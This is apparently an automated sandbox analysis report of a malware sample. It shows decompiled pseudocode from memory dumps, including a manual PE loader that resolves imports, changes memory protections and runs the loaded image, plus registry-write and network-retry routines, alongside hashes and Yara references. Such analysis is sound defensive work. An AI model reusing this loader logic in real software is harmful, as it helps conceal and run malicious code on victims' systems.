                                                                                                                                                                                                                                Function 00A92AE3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A92AE3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E00A93037(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E00A99DA2(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E00A99BAF(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0xa9d270, 0, _t25);
				}
				return _t22;
			}











                                                                                                                                                                                                                                0x00a92ae3
                                                                                                                                                                                                                                0x00a92af4
                                                                                                                                                                                                                                0x00a92af8
                                                                                                                                                                                                                                0x00a92b53
                                                                                                                                                                                                                                0x00a92afa
                                                                                                                                                                                                                                0x00a92b01
                                                                                                                                                                                                                                0x00a92b09
                                                                                                                                                                                                                                0x00a92b0c
                                                                                                                                                                                                                                0x00a92b11
                                                                                                                                                                                                                                0x00a92b15
                                                                                                                                                                                                                                0x00a92b1b
                                                                                                                                                                                                                                0x00a92b23
                                                                                                                                                                                                                                0x00a92b26
                                                                                                                                                                                                                                0x00a92b3e
                                                                                                                                                                                                                                0x00a92b3e
                                                                                                                                                                                                                                0x00a92b49
                                                                                                                                                                                                                                0x00a92b49
                                                                                                                                                                                                                                0x00a92b5a

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: lstrlen.KERNEL32(?,00000000,04FD9BB8,00000000,00A96F37,04FD9D96,?,?,?,?,?,69B25F44,00000005,00A9D00C), ref: 00A9303E
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: mbstowcs.NTDLL ref: 00A93067
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: memset.NTDLL ref: 00A93079
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,04FD9364), ref: 00A92B1B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,04FD9364), ref: 00A92B49
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1500278894-1536154274
                                                                                                                                                                                                                                • Opcode ID: cda3a5b98e80cd3ddb72eaf52f9dc4bc31054bbd90c498f4da5c6eed444dfc45
                                                                                                                                                                                                                                • Instruction ID: 05ef3d55cee510f50e8663c187087838f2f3dfec7db83673e8ff1bd004a0f2fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cda3a5b98e80cd3ddb72eaf52f9dc4bc31054bbd90c498f4da5c6eed444dfc45
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B017C36310249BADF216FA99D85F9B7BF9EF84714F10002AFA009A161EA72D9658760
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A95341, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                                                			E00A95341(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E00A95157(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0xa9c2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                                                                                                                                                                                                                0x00a95345
                                                                                                                                                                                                                                0x00a95352
                                                                                                                                                                                                                                0x00a95354
                                                                                                                                                                                                                                0x00a95355
                                                                                                                                                                                                                                0x00a9535d
                                                                                                                                                                                                                                0x00a9535d
                                                                                                                                                                                                                                0x00a95361
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95358
                                                                                                                                                                                                                                0x00a95359
                                                                                                                                                                                                                                0x00a9535c
                                                                                                                                                                                                                                0x00a9535c
                                                                                                                                                                                                                                0x00a95369
                                                                                                                                                                                                                                0x00a9536e
                                                                                                                                                                                                                                0x00a95373
                                                                                                                                                                                                                                0x00a9537b
                                                                                                                                                                                                                                0x00a95381
                                                                                                                                                                                                                                0x00a95383
                                                                                                                                                                                                                                0x00a95386
                                                                                                                                                                                                                                0x00a9538a
                                                                                                                                                                                                                                0x00a9538c
                                                                                                                                                                                                                                0x00a9538f
                                                                                                                                                                                                                                0x00a9538f
                                                                                                                                                                                                                                0x00a95390
                                                                                                                                                                                                                                0x00a95392
                                                                                                                                                                                                                                0x00a9538f
                                                                                                                                                                                                                                0x00a9539c
                                                                                                                                                                                                                                0x00a9539f
                                                                                                                                                                                                                                0x00a953a2
                                                                                                                                                                                                                                0x00a953a3
                                                                                                                                                                                                                                0x00a953a5
                                                                                                                                                                                                                                0x00a953ac
                                                                                                                                                                                                                                0x00a953ac
                                                                                                                                                                                                                                0x00a953b8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,00000000,04FD95AC,00A95884,?,00A9461A,?,04FD95AC,?,00A95884), ref: 00A9535D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(?,00A9C2A4,00000002,?,00A9461A,?,04FD95AC,?,00A95884), ref: 00A9537B
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,?,00A9461A,?,04FD95AC,?,00A95884), ref: 00A95386
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Trim
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3043112668-0
                                                                                                                                                                                                                                • Opcode ID: 5c28c4e3f70f9961530ca232ad30495d86ed035db00732e80ba77ce457364ad2
                                                                                                                                                                                                                                • Instruction ID: f1c0b1c0f31b7243c75a60367eb9b11932a78ca29425a297b91937bd668d291c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c28c4e3f70f9961530ca232ad30495d86ed035db00732e80ba77ce457364ad2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F201B175B007466FEB165B7A8C6AF6B7BDDEB85380F141011BA45CF282D9B0C8428760
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A95B8B, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                			E00A95B8B(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x7021e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                                                                                                                                                                                                                0x00a95b92
                                                                                                                                                                                                                                0x00a95b9f
                                                                                                                                                                                                                                0x00a95ba1
                                                                                                                                                                                                                                0x00a95ba4
                                                                                                                                                                                                                                0x00a95be9
                                                                                                                                                                                                                                0x00a95bf1
                                                                                                                                                                                                                                0x00a95bf7
                                                                                                                                                                                                                                0x00a95bfb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95ba8
                                                                                                                                                                                                                                0x00a95bae
                                                                                                                                                                                                                                0x00a95bb6
                                                                                                                                                                                                                                0x00a95be7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95bb8
                                                                                                                                                                                                                                0x00a95bb8
                                                                                                                                                                                                                                0x00a95bc2
                                                                                                                                                                                                                                0x00a95bc6
                                                                                                                                                                                                                                0x00a95bcf
                                                                                                                                                                                                                                0x00a95bd7
                                                                                                                                                                                                                                0x00a95c05
                                                                                                                                                                                                                                0x00a95bd9
                                                                                                                                                                                                                                0x00a95bd9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a95bd9
                                                                                                                                                                                                                                0x00a95bd7
                                                                                                                                                                                                                                0x00a95bc2
                                                                                                                                                                                                                                0x00a95c08
                                                                                                                                                                                                                                0x00a95c0f
                                                                                                                                                                                                                                0x00a95c0f
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A95BA8
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00A9A77A,00000000,?,?), ref: 00A95BFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1452528299-1701360479
                                                                                                                                                                                                                                • Opcode ID: 74b32cfce10eab130f519c213abd771e159f4309e9d9819323559b0e25fe6f08
                                                                                                                                                                                                                                • Instruction ID: c0cda94174d4e13ba8eb315226a531923d287f1967e94d1786fcfd1558143c01
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74b32cfce10eab130f519c213abd771e159f4309e9d9819323559b0e25fe6f08
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24014035E04608FBDF11DFB6DC49D9EBFF8EB85750F108066E905E2150D6708A44DBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A953BB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A953BB(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xa9d270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                0x00a953c7
                                                                                                                                                                                                                                0x00a953cd

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3298025750-1536154274
                                                                                                                                                                                                                                • Opcode ID: aa3764984cc7292ef507970298d78278d390c311f143ab2d1ed2d2360731379c
                                                                                                                                                                                                                                • Instruction ID: aca9cadea1c18a4a26e09415d7fc8f93ae71156dfe1226a444faafeebf91fe12
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa3764984cc7292ef507970298d78278d390c311f143ab2d1ed2d2360731379c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84B012F1300100EBCE21CBD0DF04F05BA31B750700F004013B30400070CA315422FB25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A96B85, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                			E00A96B85(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00A94A6A(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xa9d2e0; // 0x453a5a8
						_t20 = _t68 + 0xa9e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00A95626(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                                                                                                                                0x00a96b8b
                                                                                                                                                                                                                                0x00a96b8e
                                                                                                                                                                                                                                0x00a96b9e
                                                                                                                                                                                                                                0x00a96ba7
                                                                                                                                                                                                                                0x00a96bab
                                                                                                                                                                                                                                0x00a96c79
                                                                                                                                                                                                                                0x00a96c7f
                                                                                                                                                                                                                                0x00a96c7f
                                                                                                                                                                                                                                0x00a96bc5
                                                                                                                                                                                                                                0x00a96bca
                                                                                                                                                                                                                                0x00a96bce
                                                                                                                                                                                                                                0x00a96bd4
                                                                                                                                                                                                                                0x00a96bd9
                                                                                                                                                                                                                                0x00a96be0
                                                                                                                                                                                                                                0x00a96bef
                                                                                                                                                                                                                                0x00a96bef
                                                                                                                                                                                                                                0x00a96bf3
                                                                                                                                                                                                                                0x00a96bf5
                                                                                                                                                                                                                                0x00a96c01
                                                                                                                                                                                                                                0x00a96c0c
                                                                                                                                                                                                                                0x00a96c17
                                                                                                                                                                                                                                0x00a96c1b
                                                                                                                                                                                                                                0x00a96c25
                                                                                                                                                                                                                                0x00a96c29
                                                                                                                                                                                                                                0x00a96c2b
                                                                                                                                                                                                                                0x00a96c30
                                                                                                                                                                                                                                0x00a96c37
                                                                                                                                                                                                                                0x00a96c47
                                                                                                                                                                                                                                0x00a96c47
                                                                                                                                                                                                                                0x00a96c30
                                                                                                                                                                                                                                0x00a96c29
                                                                                                                                                                                                                                0x00a96c49
                                                                                                                                                                                                                                0x00a96c4e
                                                                                                                                                                                                                                0x00a96c53
                                                                                                                                                                                                                                0x00a96c53
                                                                                                                                                                                                                                0x00a96c56
                                                                                                                                                                                                                                0x00a96c5f
                                                                                                                                                                                                                                0x00a96c64
                                                                                                                                                                                                                                0x00a96c64
                                                                                                                                                                                                                                0x00a96c69
                                                                                                                                                                                                                                0x00a96c6e
                                                                                                                                                                                                                                0x00a96c6e
                                                                                                                                                                                                                                0x00a96c69
                                                                                                                                                                                                                                0x00a96bf3
                                                                                                                                                                                                                                0x00a96c70
                                                                                                                                                                                                                                0x00a96c76
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A94A6A: SysAllocString.OLEAUT32(80000002), ref: 00A94AC7
                                                                                                                                                                                                                                  • Part of subcall function 00A94A6A: SysFreeString.OLEAUT32(00000000), ref: 00A94B2D
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00A96C64
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00A948F5), ref: 00A96C6E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 986138563-0
                                                                                                                                                                                                                                • Opcode ID: 3fb47859ddc7b1167c6d651d9afc790c80827529c1622601dd678bbfe0009be6
                                                                                                                                                                                                                                • Instruction ID: 5517a6a2cc065f0a6704588841a64043a6ea86b94bbf95c23dc3f418ed7ee348
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fb47859ddc7b1167c6d651d9afc790c80827529c1622601dd678bbfe0009be6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF312A72600119EFCF15DFA9C988C9BBBB9FFC97407144659F8459B220E632DD51CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A61F7C, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                			E00A61F7C(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0xa641c0;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0xa641c0 - 0x69b24f45 &  !( *0xa641c0 - 0x69b24f45);
				_t18 = E00A61C61( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0xa641c0 - 0x69b24f45 &  !( *0xa641c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0xa641c0 - 0x69b24f45 &  !( *0xa641c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00A61AF2(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00A616C3(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00A61B7F(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00A61F0A(_t42);
					L8:
					return _t29;
				}
			}














                                                                                                                                                                                                                                0x00a61f84
                                                                                                                                                                                                                                0x00a61f86
                                                                                                                                                                                                                                0x00a61fa2
                                                                                                                                                                                                                                0x00a61fb3
                                                                                                                                                                                                                                0x00a61fba
                                                                                                                                                                                                                                0x00a62018
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61fbc
                                                                                                                                                                                                                                0x00a61fbc
                                                                                                                                                                                                                                0x00a61fc6
                                                                                                                                                                                                                                0x00a61fca
                                                                                                                                                                                                                                0x00a61fcf
                                                                                                                                                                                                                                0x00a61fd2
                                                                                                                                                                                                                                0x00a61fd7
                                                                                                                                                                                                                                0x00a61fdb
                                                                                                                                                                                                                                0x00a61fe0
                                                                                                                                                                                                                                0x00a61fe5
                                                                                                                                                                                                                                0x00a61fe9
                                                                                                                                                                                                                                0x00a61fee
                                                                                                                                                                                                                                0x00a61fef
                                                                                                                                                                                                                                0x00a61ff3
                                                                                                                                                                                                                                0x00a61ff8
                                                                                                                                                                                                                                0x00a62000
                                                                                                                                                                                                                                0x00a62000
                                                                                                                                                                                                                                0x00a61ff8
                                                                                                                                                                                                                                0x00a61fe9
                                                                                                                                                                                                                                0x00a61fdb
                                                                                                                                                                                                                                0x00a62002
                                                                                                                                                                                                                                0x00a6200b
                                                                                                                                                                                                                                0x00a6200f
                                                                                                                                                                                                                                0x00a62019
                                                                                                                                                                                                                                0x00a6201f
                                                                                                                                                                                                                                0x00a6201f

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00A61FB8,?,?,?,?,?,00000002,?,?), ref: 00A61C85
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetProcAddress.KERNEL32(00000000,?), ref: 00A61CA7
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetProcAddress.KERNEL32(00000000,?), ref: 00A61CBD
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetProcAddress.KERNEL32(00000000,?), ref: 00A61CD3
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetProcAddress.KERNEL32(00000000,?), ref: 00A61CE9
                                                                                                                                                                                                                                  • Part of subcall function 00A61C61: GetProcAddress.KERNEL32(00000000,?), ref: 00A61CFF
                                                                                                                                                                                                                                  • Part of subcall function 00A61AF2: memcpy.NTDLL(00000002,?,00A61FC6,?,?,?,?,?,00A61FC6,?,?,?,?,?,?,?), ref: 00A61B29
                                                                                                                                                                                                                                  • Part of subcall function 00A61AF2: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00A61B5E
                                                                                                                                                                                                                                  • Part of subcall function 00A616C3: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00A616FB
                                                                                                                                                                                                                                  • Part of subcall function 00A61B7F: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00A61BB8
                                                                                                                                                                                                                                  • Part of subcall function 00A61B7F: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00A61C2D
                                                                                                                                                                                                                                  • Part of subcall function 00A61B7F: GetLastError.KERNEL32 ref: 00A61C33
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 00A61FFA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 2673762927-1084903527
                                                                                                                                                                                                                                • Opcode ID: bd76e6eeae303486a9e66122e57a5c58ca5653aa8ce7b68299430e088b80f67a
                                                                                                                                                                                                                                • Instruction ID: 55436c56f19618a339a911487f1282007b6258fd27585ce994688b0901e1af70
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd76e6eeae303486a9e66122e57a5c58ca5653aa8ce7b68299430e088b80f67a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59113A76600711AFD721ABE9CC81EEF7BFCBF983147054129FA0297601EAE1ED068790
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A61064, Relevance: 3.1, APIs: 2, Instructions: 59stringthreadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A61064() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0xa641c4;
				if( *0xa641ac > 5) {
					_t16 = _t15 + 0xa650f9;
				} else {
					_t16 = _t15 + 0xa650b1;
				}
				E00A614A8(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E00A619C5( &_v32,  &_v16,  *0xa641c0 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0xa641b8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00A61210(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0xa641b8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00A62065(_t44, _t32 + 4);
						}
					}
					_t25 = E00A61F7C(_v28); // executed
				}
				ExitThread(_t25);
			}















                                                                                                                                                                                                                                0x00a6106a
                                                                                                                                                                                                                                0x00a6107b
                                                                                                                                                                                                                                0x00a61085
